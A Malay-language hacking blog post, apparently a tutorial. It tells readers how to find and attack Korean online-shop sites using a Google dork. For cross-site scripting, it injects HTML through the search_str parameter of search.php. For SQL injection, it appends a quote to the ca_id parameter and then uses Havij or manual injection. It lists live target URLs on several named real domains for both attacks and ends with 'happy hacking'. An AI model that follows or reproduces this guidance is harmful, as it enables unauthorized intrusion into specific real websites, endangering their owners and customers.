Website yang terdedah kepada vulnerability ini kebanyakan adalah website korea.
Ok jom mula~
XSS
1. Mula-mula search google dork :
inurl:"/mall/list.php?ca_id="
Ok dalam tutorial ni aku akan guna website ini :
2. Vuln nya terdapat di search.php?search_str=XSS
Ataupun korang cuma perlu masukkan code html kedalam kotak search.
Contoh :
http://gallery-hw.co.kr/mall/search.php?search_str=<marquee>XSS</marquee>
Demo : XSS
Live Target :
http://okkorea119.com/mall/search.php?search_str=XSShttp://plusmind.co.kr/mall/search.php?search_str=XSS
http://hktape.co.kr/mall/search.php?search_str=XSS
http://rmbdiary.com/mall/search.php?search_str=XSS
http://jinsungdiary.com/mall/search.php?search_str=XSS
http://gallery-hw.co.kr/mall/search.php?search_str=XSS
SQLi
1. Guna dork seperti diatas.
Dalam tutorial ni aku akan guna website yang sama untuk menunjukkan bukti multiple vuln.
2. Url website yang korang dapat akan macam web ni :
http://gallery-hw.co.kr/mall/list.php?ca_id=3
Tambah ' di hujung url dan error sqli akan keluar :
Sekarang korang cuma perlu inject guna havij,manual atau benda lain. :)
Live Target :
http://www.okkorea119.com/mall/list.php?ca_id=1'http://www.dunam.co.kr/mall/list.php?ca_id=10'
http://gallery-hw.co.kr/mall/list.php?ca_id=3'
Itu saja happy hacking.
Assalamualaikum
No comments:
Post a Comment